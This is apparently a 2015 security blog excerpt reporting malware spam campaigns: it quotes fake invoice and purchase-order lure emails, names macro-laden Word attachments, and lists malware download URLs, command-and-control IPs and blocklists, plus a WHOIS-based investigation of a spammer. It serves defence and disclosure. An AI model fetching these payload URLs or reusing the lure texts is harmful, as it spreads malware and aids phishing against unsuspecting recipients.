205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)


It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.

Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151


Malware spam: "T.A.G. (The Automotive Group) Ltd." / "Lawrence Fisher [l.fisher@taghire.co.uk]" / invoice

This fake invoice does not come from The Automotive Group Ltd or any similarly-named company. Their systems have not been compromised in any way. Instead, this is a forgery with a malicous attachment. Note that the taghire.co.uk simply shows "Under Construction".
From:    Lawrence Fisher [l.fisher@taghire.co.uk]
Date:    16 February 2015 at 08:25
Subject:    invoice

Here is the invoice

Kind Regards,

Lawrence Fisher
T.A.G. (The Automotive Group) Ltd.
Unit 22 Coney Green Business Centre Wingfield View, Clay Cross, Chesterfield

Tel: 020 3750 0638

Description: 150px Crop Background Remove Logo

This e-mail is confidential and may be privileged.  It may be read, copied and used only by the intended recipient. If you have received it in error, please contact the sender immediately by return e-mail or by telephoning 020 3750 0638
So far I have only seen one sample of this, with an attachment named Invoice 0215.doc which has zero detections according to VirusTotal. It contains an obfuscated Word macro which downloads an additional component from:

http://laikah.de/js/bin.exe

Usually there are two or three versions of this document, but I have only seen one. If  you look at the macro code itself, the download location is not encrypted in the code although other elements of the process are encrypted with a string + key combination. Those combinations contain non-printable characters, possibly in an attempt to avoid anaylsus,

This .exe file is downloaded as %TEMP%\345435.exe and it has a VirusTotal detection rate of 3/57.  Automated reporting tools [1] [2] [3] show that this POSTS to 37.139.47.105. It appears that communication is attempted with the following IPs:

37.139.47.105 (Pirix, Russia)
78.140.164.160 (Webazilla, US)
95.163.121.179 (Digital Networks, Russia)
86.104.134.156 (One Telecom, Moldova)
117.223.58.214 (BSNL / Broadband Multiplay, India)
109.234.38.70 (McHost, Russia)


Also, according to the Malwr report, a DLL is dropped with a detection rate of 3/57.

Recommended blocklist:
37.139.47.105
78.140.164.160
95.163.121.179
86.104.134.156
117.223.58.214
109.234.38.70

Saturday, 14 February 2015

Spammer: Brad Smith / Unicore Health / unicorehealth.net / unicorehealth.com

This slimed its way into my mailbox:

From:    Brad Smith [sales@unicorehealth.net]
To:    Morgan Stanley [mstanley@redacted]
Date:    11 February 2015 at 15:24
Subject:    Morgan, HR related question

Hi Morgan, could you let me know a time we could talk in the next few days? For HR managers we measure and video the essential functions and physical requirements of each key job so that clients like Coca-Cola and Publix can reduce their hiring risk and job injury risk. I thought you would like to quickly view the process, some interesting examples, and how to use them in your role. Just let me know a time that works in your schedule and I will confirm back, talk then!


Regards,
Brad Smith
VP, Product Management
Unicore Health
sales@unicorehealth.net
www.unicorehealth.net

This message is confidential and intended only for the original recipient. If you have received this message in error, please delete it or mail us back with re move in the sub ject. If any follow-up is needed I show your contact information as Morgan Stanley, mstanley@redacted   and our address if needed is 3200 Downwood Circle, Ste 410, Atlanta, GA, 30327. Thank you.
Morgan Stanley? They must mean this Morgan Stanley. How did they confuse me with Morgan Stanley? Because I mention them on my website here. Now, I only know of one company that sends spam like this.. but more about them later.

Let's check the veracity of the message.. first, the mail headers.

Received: from [63.134.229.186] (port=1355 helo=mail.unicorehealth.net)
    by [redacted] with esmtp (Exim 4.80)
    (envelope-from <sales@unicorehealth.net>)
    id 1YLZ9H-0001CT-C2
    for mstanley@redacted; Wed, 11 Feb 2015 15:24:20 +0000
Received: from 31617334.unicorehealth.net
        by mail.unicorehealth.net (Right Sender 3.3) with ASMTP id YRJ55117
        for <mstanley@redacted>; Wed, 11 Feb 2015 10:24:17 -0500
Message-ID: <20150211102412.2e7c8b6c6f@6e5d>
From: "Brad Smith" <sales@unicorehealth.net>
To: "Morgan Stanley" <mstanley@redacted>
Subject: Morgan, HR related question
Date: Wed, 11 Feb 2015 10:24:12 -0500
X-Priority: 3
X-Mailer: SMTP-Mailer 3.4
MIME-Version: 1.0
Content-Type: text/plain;
    charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Received-SPF: pass ([redacted]: domain of sales@unicorehealth.net designates 63.134.229.186 as permitted sender) client-ip=63.134.229.186 envelope-from=sales@unicorehealth.net helo=mail.unicorehealth.net
X-BlackCat-Spam-Score: -10
X-Mythic-Debug: Threshold =  On =
X-Spam-Status: No, score=-1.1
We can see that the SPF record for unicorehealth.net matches it to 63.134.229.186. The domain unicorehealth.net is also hosted on the same IP, so we can be reasonably assured that this is not a forgery. Let's look at the WHOIS details for that domain..

Registrant Name: Brad Smith
Registrant Organization: Unicore Health
Registrant Street: 3200 Downwood Circle
Registrant Street: Suite 410
Registrant City: Atlanta
Registrant State/Province: Georgia
Registrant Postal Code: 30327
Registrant Country: United States
Registrant Phone: +1.6785226363
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: bsmith@unicorehealth.com


This links unicorehealth.net with unicorehealth.com. Indeed, we can find "Bradley Smith" on the unicorehealth.com web site.


I emailed Mr Smith back twice and asked him how he came across the email address. He didn't bother to reply.

Previously I mentioned that I have seen this type of spam before from one particular company, BizSummits, run by Michael Price. In particular, they look for potential names on a website and then spam them, a technique that is highly inaccurate but does seem to be relatively successful nonetheless.

Now, Unicore Health is not BizSummits. But they both use a virtual office address in Altanta, about ten miles apart. So perhaps there is some personal connection between the two businesses or the people behind them.

One of Mr Price's other businesses is called PlugMeIn  (plugmein.com), which claims to reveal the email addresses of key people on certain websites. If this uses the same approach as the BizSummits spam, then it might well be just as inaccurate. And perhaps Unicore Health is using PlugMeIn technology to find email addresses.

But since Brad Smith didn't bother to reply to me, I can't tell if this spam was the result of faulty software, a bad email address list or just plain stupidity. Personally, I won't be buying anything from them soon.

UPDATE - January 2017

For various reasons, I ended revisiting this post and discovered that unicorehealth.net now displays a site "Hartford HR Summit" which is definitely a BizSummits / Michael Price site.


Friday, 13 February 2015

Something evil on 95.163.121.0/24 (Digital Network JSC / com4tel.ru / cloudavt.com)

I've written about DINETHOSTING aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirity of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.

inetnum:        95.163.121.0 - 95.163.121.255
netname:        RU-CLOUDAVT-NET
descr:          LLC ABT Cloud Network
country:        RU
admin-c:        PPP9992-RIPE
tech-c:         PPP9992-RIPE
status:         ASSIGNED PA
mnt-by:         DN-MNT
changed:        ncc@msm.ru 20150213
source:         RIPE

person:         Andrey Tkachenko
address:        107589, Russia Moscow street Khabarovsk 4A
e-mail:         cc-it@com4tel.ru
phone:          +7 916 626 7798
fax-no:         +7 916 626 7798
nic-hdl:        PPP9992-RIPE
abuse-mailbox:  info@cloudavt.com
mnt-by:         DN-MNT
changed:        noc@msm.ru 20140429
source:         RIPE

route:          95.163.64.0/18
descr:          Digital Network JSC
descr:          Moscow, Russia
descr:          http://www.msm.ru
descr:          aggregate prefix
origin:         AS12695
mnt-by:         DN-MNT
changed:        noc@msm.ru 20121129
source:         RIPE
Tools


Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]

That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.

Malware spam: "Alison Longworth [ALongworth@usluk.com]" / "PURCHASE ORDER (34663)"

This fake purchase order spam comes with a malicious attachment:

From     Alison Longworth [ALongworth@usluk.com]
Date     13/02/2015 10:57
Subject     PURCHASE ORDER (34663)

Please find attachment below of our Purchase Order No. 34663.  Could you
please confirm receipt of this order and also advise when goods will be
available to collect.

NOTE TO ACCOUNTS: Could you please ensure all invoices for goods supplied
are forwarded promptly.  Invoices received later than 2 working days after
month end will be dated, processed and paid the following month.  To avoid
delays invoices can be sent electronically to accounts@usluk.com

Many Thanks,

Kind Regards,

Alison Longworth
Buyer (Manufacturing)
Universal Sealants (UK) Limited
Kingston House
3 Walton Road
Pattinson North
Washington
Tyne & Wear
NE38 8QA

W: www.usluk.com
E: alison.longworth@usluk.com
T: +44(0)191 416 1530
F: +44(0)191 402 1982


…Complete Solution for Bridge Deck Protection

USL BridgeCare, USL StructureCare, Nufins and Visul Systems are trading
divisions of Universal Sealants (UK) Limited.

Registered Office: Kingston House, 3 Walton Road, Pattinson North,
Washington, Tyne & Wear, NE38 8QA

Company Registration: 01494603
VAT Number: 353 8952 22

This email and any files transmitted with it are strictly confidential. It
is for the intended recipient only. If you have received this email in
error please notify the author by replying to this email. If you are not
the intended recipient, you must not disclose, copy, print or rely on this
email in any way. Any views expressed by an individual within email which
do not constitute or record professional advice relating to the business
of USL BridgeCare, USL StructureCare, Nufins and Visul Systems, do not
necessarily reflect the views of the company.

Important Notice

The information contained in this communication (including any
attachments) is confidential, may be attorney-client privileged, may
constitute inside information, and is intended only for the use of the
addressee. *Any Unauthorized use, disclosure or copying of this
information or any part thereof is strictly prohibited and may be
unlawful. If you have received this communication in error, please notify
us immediately by return e-mail and destroy this communication and all
copies thereof, including all attachments.
Attached is a malicious Word document 2600_001.DOC which actually comes in two different versions with low detection rates [1] [2] containing two slightly different macros [1] [2] which download a component from the following locations:

http://stroygp.ru/js/bin.exe
http://ibw-bautzen.de/js/bin.exe


This is saved as %TEMP%\dsHHH.exe and it has a detection rate of 13/57. Automated analysis tools [1] [2] [3] show the malware POSTing to:

37.139.47.105 (Pirix, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)

The malware also drop a DLL with a MD5 of 6693f0093a2d6740149de5d6e950f6c6 (VT 6/57) which is the same Dridex DLL used in this campaign.